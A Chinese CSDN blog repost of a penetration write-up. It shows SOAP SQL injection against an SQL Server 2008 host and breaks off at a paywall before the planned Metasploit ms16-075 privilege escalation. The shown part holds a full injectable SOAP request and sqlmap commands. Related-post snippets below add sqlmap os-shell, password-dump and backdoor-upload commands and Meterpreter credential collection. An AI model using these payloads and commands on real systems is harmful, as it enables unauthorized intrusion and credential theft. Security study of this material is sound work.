soap注入某sql2008服务器结合msf进行提权

最新推荐文章于 2023-12-22 11:29:13 发布
最新推荐文章于 2023-12-22 11:29:13 发布
阅读量3.2k 收藏 5
点赞数
文章标签: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaoi123/article/details/80583487
版权
本文介绍了如何利用soap注入漏洞对sql2008服务器进行渗透测试。首先通过awvs扫描发现soap注入,然后使用sqlmap确认并获取webshell。接着尝试常规提权失败后,借助msf进行ms16-075漏洞提权,最终成功获取系统权限。文章总结了渗透过程中的关键命令和防御建议。
摘要由CSDN通过智能技术生成

原文作者:陈小兵

    在实际成功渗透过程中,漏洞的利用都是多个技术的融合,最新技术的实践,本次渗透利用sqlmap来确认注入点,通过sqlmap来获取webshell,结合msf来进行ms16-075的提权,最终获取了目标服务器的系统权限。本文算是漏洞利用的一个新的拓展,在常规Nday提权不成功的情况下,结合msf进行ms16-075成功提权的一个经典案例。

1.1.1扫描soap注入漏洞

    1.使用awvs中的web services scanner进行漏洞扫描   打开awvs,选择web services scanner进行漏洞扫描,如图1所示,在wsdl url中填写目标url地址,注意一定是asmx?wsdl,有的是有asmx文件,如果没有则可以直接填写,例如:http://1**.***.***.***:8081/?wsdl

image.png

图1进行soap注入漏洞扫描

2.处理sql盲注    

    通过awvs扫描,确认该url地址存在sql盲注(26处),在awvs中,单击右边的“view http headers”,将其内容复制到一个文本文件中,同时处理存在漏洞的语句,在本例中例如:

image.png
需要将红色字图部分更换为”-1*”。

3.完整的header包中内容如下:

POST /Service1.asmx HTTP/1.1

Content-Type: text/xml

SOAPAction: “http://tempuri.org/ZcpdList”

Content-Length: 716

X-Requested-With: XMLHttpRequest

Referer: http://1**.***.***.***:8081/?wsdl

Host: 1**.***.***.***:8081

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

Accept: */*

 

<SOAP-ENV:Envelope xmlns:SOAP-ENV=”http://schemas.xmlsoap.org/soap/envelope/” xmlns:soap=”http://schemas.xmlsoap.org/wsdl/soap/”  xmlns:xsd=”http://www.w3.org/1999/XMLSchema”  xmlns:xsi=”http://www.w3.org/1999/XMLSchema-instance”  xmlns:m0=”http://tempuri.org/”  xmlns:SOAP-ENC=”http://schemas.xmlsoap.org/soap/encoding/” xmlns:urn=”http://tempuri.org/” xmlns:urn2=”http://tempuri.org/AbstractTypes”>

     <SOAP-ENV:Header/>

     <SOAP-ENV:Body>

        <urn:ZcpdList>

           <urn:Inventory_dhs>

             <urn:string>-1*</urn:string>

           </urn:Inventory_dhs>

        </urn:ZcpdList>

     </SOAP-ENV:Body>

</SOAP-ENV:Envelope>

Response

1.1.2确认soap注入漏洞

    1.使用sqlmap检测是否存在sql注入漏洞   将前面的header中的内容保存为1**.***.***.***.txt,将该文件复制到sqlmap.py程序所在目录,执行命令:sqlmap.py -r 1**.***.***.***.txt,对sqlmap提示的信息进行确认:

custom injection marker (‘*’) found in option ‘–data’. Do you want to process it? [Y/n/q] [color=Red]y[/color]

SOAP/XML data found in POST data. Do you want to process it? [Y/n/q][color=Red]y[/color]

如图2所示,sqlmap确认该sql注入漏洞存在,且该数据库服务器为windows 2008 R2,数据库版本为sql server 2008,soap存在漏洞为union查询。

image.png

图2 存在soap注入漏洞

最低0.47元/天 解锁文章
张悠悠66
关注
sqlmap注入及ms16-075提权总结
weixin_33696106的博客
06-04 952
sqlmap注入及ms16-075提权总结(1)sqlmap执行命令sqlmap.py -r 1**.***.***.***.txtsqlmap.py -r 1**.***.***.***.txt --is-dbsqlmap.py -r 1**.***.***.***.txt --password --batchsqlmap.py -r 1**.***.***.***.txt --os-shell...
使用MSF进行提权(windows提权、linux提权、wesng使用
最新发布
2401_85773496的博客
08-06 863
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…不断更新大量的Exploit程序和报告,它的搜索功能可以搜索整个网站内容。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化。
windows2008提权0day
03-10
windows2008提权0day
第四更
qq_39670065的博客
02-15 566
SQLMap简单使用 这里使用DVWA进行SQL注入测试 (需要了解DVWA的搭建和SQLMap的配置) 1.启动phpstudy,在浏览器中输入127.0.0.1/dvwa 进入登陆界面,默认账号密码分别为admin,password 在DVWA Security中Security Level 选为 Low 点击Submit 2.使用burp进行抓包,找到含参数的数据包 在User ID栏中输...
sqlmap学习(八)指定位置注入
热门推荐
rane的博客
03-26 1万+
1、sqlmap设置指定注入参数 -p:指定参数进行扫描,不是扫描所有参数,这样可以避免浪费时间到非注入点参数上,从而提高扫描效率。 python sqlmap.py -u "url" -p "id,user-agent" --skip跳过指定参数扫描,和-p作用相反,它用来跳过需要扫描的参数。 python sqlmap.py -u "url" --skip "id,user-agent" ...
螣龙安科笔记:内网渗透测试(三)
katekatezzzzz的博客
05-27 1456
经过前两篇文章的介绍,相信大家对于内网渗透测试的一些基础知识已经有了足够的了解,这篇文章就将带你一起来了解内网渗透测试的全过程。 (四)内网渗透流程 1.渗透工具准备 1.1扫描工具 1.1.1主动扫描工具 web应用漏洞扫描器:用于web项目的安全测试工具,扫描网站所有url,自动测试是否存在各种类型的漏洞。如:AWVS、appscan 综合漏洞扫描器:集合了多种功能的漏洞扫描器。如Fux iscanner,具有如下功能:漏洞检测和管理,验证测试程序,IT资产发现和管理,端口扫描器,子域扫描器
安全测试工具Metasploit与漏洞扫描(上)
Maggie97的博客
12-03 1万+
一、漏洞及漏洞发掘方法   漏洞,是指在硬件、软件、协议实现或系统安全策略上存在缺陷,攻击者能够在未授权的情况下对系统进行访问或破坏。它会成为入侵者侵入系统和植入恶意软件的入口,影响系统用户的切身利益。漏洞与目标系统的操作系统版本、软件版本以及服务设置密切相关。研究漏洞必须要了解当前计算机系统及其安全问题的最新发展动态。常见的漏洞包括缓冲区溢出漏洞、跨站脚本漏洞(XSS)、SQL注入漏洞、数据库漏洞以及WEB应用漏洞等。   常见的漏洞发掘方法分为以下几种。   ·黑盒攻击(Fuzzing):即通过注入..
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 989
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
笔记,后期整理
weixin_30278237的博客
08-06 8257
VM 虚拟各种系统的工具 安装目录 不要放在C盘 需要下载的镜像Windows NT win7 xp server08R2 server12类Nnix centos 6/7/8 ubuntu 14/16/18 kali安装 win7 1g=1024M1M=1024KB1KB=1024bit1bit 是一个字节 一个字节就是8位由0或者1组成(二进制) 10 进制0-9组成的数字...
SQL sever远程连接
09-12
SQL sever远程连接
Sqlmap使用/联合msf
m0_63160363的博客
12-22 915
python sqlmap.py -u "URL" --file-write "本地后门路径" --file-dest "写入目标地址文件路径" #文件写入。python sqlmap.py -u "URL" --dump -C "列名,列名" -T "表名" -D "数据库名" #获取数据库表的列内的内容。python sqlmap.py -u "URL" --dump -C "列名" -T "表名" -D "数据库名" #获取数据库表的列内的内容。
工控机服务器未能识别,Web Service 错误:服务器未能识别 HTTP 头 SOAPAction 的值: http://tempuri.org/...
weixin_36485103的博客
08-12 1113
Java codeSystem.Web.Services.Protocols.SoapException: 服务器未能识别 HTTP 头 SOAPAction 的值: http://tempuri.org/GetSDCities。在 System.Web.Services.Protocols.Soap11ServerProtocolHelper.RouteRequest()在 System.Web...
msf 笔记 & sqlmap 笔记
dqd66的博客
10-18 515
msf exploit(handler) > set exitonsession false 运行这条命令后,4444端口会一直处于侦听状态meterpreter > run post/windows/gather/credentials/credential_collector 目标主机上的身份认证信息meterpreter > run post/windows/gather/enum_applications 目标主机安装了哪些软件。
Python全栈(五)Web安全攻防之7.MySQL注入读写文件和HTTP头中的SQL注入
CUFEECR的博客
03-10 4512
pikachu是一个比较详细的漏洞平台;MySQL读取文件用load_file()函数;写入文件用into outfile。UPDATEXML()函数用于捕捉错误;在user-agent后加入payload进行user-agent注入;通过修改请求头中的referer进行SQL注入测试,可以通过3种方式进行安全测试;在请求头的cookie参数中加入payload‘进行cookie测试;使用Base64加密的注入语句,插入到Cookie对应的位置完成SQL注入漏洞的探测。
Python全栈(五)Web安全攻防之3.sqlmap的使用介绍
CUFEECR的博客
02-27 5096
SQL注入,就是通过把SQL命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令;Sqlmap的输出信息按从简到繁共分为7个级别依次为0、1、2、3、4、5和6;sqlmap获取目标的方式有直连数据库、指定目标URL和读取不同文件类型进行SQL注入3种方式。sqlmap设置请求参数的类型包括HTTP方法、设置post提交参数、设置cookie参数、设置user-agent、设置代理、设置延迟、设置超时、设置超时重试次数、设置随机参数、设置忽略401和避免被屏蔽等。
SQL SERVER2008的账户
weixin_30235225的博客
12-04 405
##MS_PolicyEventProcessingLogin## 事件处理帐户, 内部使用 ##MS_PolicyTsqlExecutionLogin## TSQL语句执行 帐户 内部使用 NT SERVICE\MSQLSERVER 运行SQLSERVER服务的帐户 NT Service\SQLServerAGENT 用来运行代理服务的账户,例如一些需要自动...
msf linux提权
09-17
进行kali对linux的渗透攻击时,可以利用MSF进行提权操作。有几种方法可以实现这个目标。 首先,可以利用MSF本身存在的后门漏洞进行攻击。这样可以获得对linux系统的访问权限,并进一步提权。 其次,可以使用攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值